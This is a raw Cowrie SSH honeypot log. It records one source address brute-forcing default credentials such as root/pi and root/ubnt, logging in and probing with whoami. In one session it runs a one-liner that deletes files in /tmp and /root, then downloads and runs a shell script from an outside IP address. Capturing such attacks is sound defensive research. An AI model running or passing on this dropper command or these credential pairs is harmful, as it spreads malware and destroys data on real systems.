{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.479696Z","src_ip":"87.120.191.13","session":"cd73de86ce2c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.497980Z","src_ip":"87.120.191.13","session":"940e88faa3a6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.499285Z","src_ip":"87.120.191.13","session":"935de9e6125e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.510674Z","src_ip":"87.120.191.13","session":"fe7affc766f2"}
{"eventid":"cowrie.login.failed","username":"noc","password":"root","message":"login attempt [noc/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.579669Z","src_ip":"87.120.191.13","session":"e3c65ca0fb46"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.583020Z","src_ip":"87.120.191.13","session":"cd73de86ce2c"}
{"eventid":"cowrie.login.failed","username":"pi","password":"root","message":"login attempt [pi/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.594990Z","src_ip":"87.120.191.13","session":"940e88faa3a6"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"root","message":"login attempt [ubnt/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.598628Z","src_ip":"87.120.191.13","session":"81ac060622af"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root","message":"login attempt [ftpuser/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.603698Z","src_ip":"87.120.191.13","session":"fe7affc766f2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root","message":"login attempt [admin/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.605758Z","src_ip":"87.120.191.13","session":"935de9e6125e"}
{"eventid":"cowrie.login.failed","username":"student","password":"root","message":"login attempt [student/root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.625890Z","src_ip":"87.120.191.13","session":"fdec22105599"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.862741Z","src_ip":"87.120.191.13","session":"0ca8d1d1a7c4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38530,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f75c93cba66","protocol":"ssh","message":"New connection: 87.120.191.13:38530 (1.2.3.4:22) [session: 9f75c93cba66]","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.891407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.905025Z","src_ip":"87.120.191.13","session":"9f75c93cba66"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:26.939190Z","src_ip":"87.120.191.13","session":"9f75c93cba66"}
{"eventid":"cowrie.login.success","username":"root","password":"pi","message":"login attempt [root/pi] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.076313Z","src_ip":"87.120.191.13","session":"9f75c93cba66"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38540,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7603335c8b9","protocol":"ssh","message":"New connection: 87.120.191.13:38540 (1.2.3.4:22) [session: b7603335c8b9]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.132389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.134744Z","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:53:27.175275Z","src_ip":"87.120.191.13","session":"9f75c93cba66"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.176001Z","src_ip":"87.120.191.13","session":"9f75c93cba66"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.177611Z","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.208111Z","src_ip":"87.120.191.13","session":"9f75c93cba66"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.209176Z","src_ip":"87.120.191.13","session":"9f75c93cba66"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38550,"dst_ip":"1.2.3.4","dst_port":22,"session":"61ed8a037df6","protocol":"ssh","message":"New connection: 87.120.191.13:38550 (1.2.3.4:22) [session: 61ed8a037df6]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.235089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.237832Z","src_ip":"87.120.191.13","session":"61ed8a037df6"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.257674Z","src_ip":"87.120.191.13","session":"61ed8a037df6"}
{"eventid":"cowrie.login.success","username":"root","password":"pi","message":"login attempt [root/pi] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.263852Z","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:53:27.396475Z","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.397338Z","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.login.success","username":"root","password":"ubnt","message":"login attempt [root/ubnt] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.454731Z","src_ip":"87.120.191.13","session":"61ed8a037df6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.471078Z","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d","shasum":"e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.500393Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d to var/lib/cowrie/downloads/e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38560,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dca916f0cf3","protocol":"ssh","message":"New connection: 87.120.191.13:38560 (1.2.3.4:22) [session: 4dca916f0cf3]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.537055Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.538152Z","src_ip":"87.120.191.13","session":"b7603335c8b9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.561111Z","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.561868Z","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:53:27.633214Z","src_ip":"87.120.191.13","session":"61ed8a037df6"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.633899Z","src_ip":"87.120.191.13","session":"61ed8a037df6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.690766Z","src_ip":"87.120.191.13","session":"e3c65ca0fb46"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.708231Z","src_ip":"87.120.191.13","session":"fdec22105599"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.710085Z","src_ip":"87.120.191.13","session":"81ac060622af"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.711032Z","src_ip":"87.120.191.13","session":"fe7affc766f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.712729Z","src_ip":"87.120.191.13","session":"61ed8a037df6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.713434Z","src_ip":"87.120.191.13","session":"61ed8a037df6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.714074Z","src_ip":"87.120.191.13","session":"cd73de86ce2c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.714791Z","src_ip":"87.120.191.13","session":"940e88faa3a6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.727056Z","src_ip":"87.120.191.13","session":"935de9e6125e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38574,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e203e42409a","protocol":"ssh","message":"New connection: 87.120.191.13:38574 (1.2.3.4:22) [session: 9e203e42409a]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.735442Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38590,"dst_ip":"1.2.3.4","dst_port":22,"session":"db2f113c671d","protocol":"ssh","message":"New connection: 87.120.191.13:38590 (1.2.3.4:22) [session: db2f113c671d]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.736518Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38604,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d95fd758965","protocol":"ssh","message":"New connection: 87.120.191.13:38604 (1.2.3.4:22) [session: 6d95fd758965]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.742805Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38608,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cde361b86cc","protocol":"ssh","message":"New connection: 87.120.191.13:38608 (1.2.3.4:22) [session: 7cde361b86cc]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.743491Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38612,"dst_ip":"1.2.3.4","dst_port":22,"session":"3706b4f0989a","protocol":"ssh","message":"New connection: 87.120.191.13:38612 (1.2.3.4:22) [session: 3706b4f0989a]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.744964Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38624,"dst_ip":"1.2.3.4","dst_port":22,"session":"f19c498b1b95","protocol":"ssh","message":"New connection: 87.120.191.13:38624 (1.2.3.4:22) [session: f19c498b1b95]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.745699Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38610,"dst_ip":"1.2.3.4","dst_port":22,"session":"08890d54e889","protocol":"ssh","message":"New connection: 87.120.191.13:38610 (1.2.3.4:22) [session: 08890d54e889]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.746502Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38628,"dst_ip":"1.2.3.4","dst_port":22,"session":"142a6c14bf41","protocol":"ssh","message":"New connection: 87.120.191.13:38628 (1.2.3.4:22) [session: 142a6c14bf41]","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.752990Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.772415Z","src_ip":"87.120.191.13","session":"7cde361b86cc"}
